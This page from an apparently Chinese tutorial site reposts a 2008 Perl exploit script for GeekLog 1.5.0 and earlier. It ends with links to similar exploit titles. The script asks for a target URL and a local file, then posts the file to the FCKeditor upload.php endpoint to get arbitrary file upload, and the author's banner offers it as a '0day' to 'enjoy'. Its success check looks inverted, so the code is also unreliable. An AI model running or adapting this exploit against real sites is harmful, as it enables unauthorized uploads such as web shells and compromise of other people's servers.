手机
当前位置:查字典教程网 >网络安全 >Exploit >GeekLog
GeekLog
摘要:#!/usr/bin/perlusewarnings;usestrict;useLWP::UserAgent;useHTTP::Reques...

#!/usr/bin/perl use warnings;

use strict;

use LWP::UserAgent;

use HTTP::Request::Common; print <<INTRO;

GeekLog <= 1.5.0 Remote Arbitrary File Upload

Discovered && Coded By: t0pP8uZz

0day?!?Most sites need custom configuration files

for this exploit to actually work, anyway enjoy

Discovered On: 20 August 2008 / milw0rm.com

Script Download: http://www.geeklog.net

INTRO print "Enter URL(ie: http://site.com): ";

chomp(my $url=<STDIN>);

print "Enter File Path(path to local file to upload): ";

chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new;

my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',

Content_Type => 'form-data',

Content => [ NewFile => $file ] ); if($re->is_success) {

if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!n"; }

else { print "File Upload Is Disabled! Failed!n"; }

} else { print "HTTP Request Failed!n"; } exit;

【GeekLog】相关文章:

WS_FTP Home/Professional FTP Client Remote Format String PoC

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Maian Guestbook

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Comdev Web Blogger

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

MS Internet Explorer (FTP Server Response) DoS Exploit

AuraCMS

精品推荐
分类导航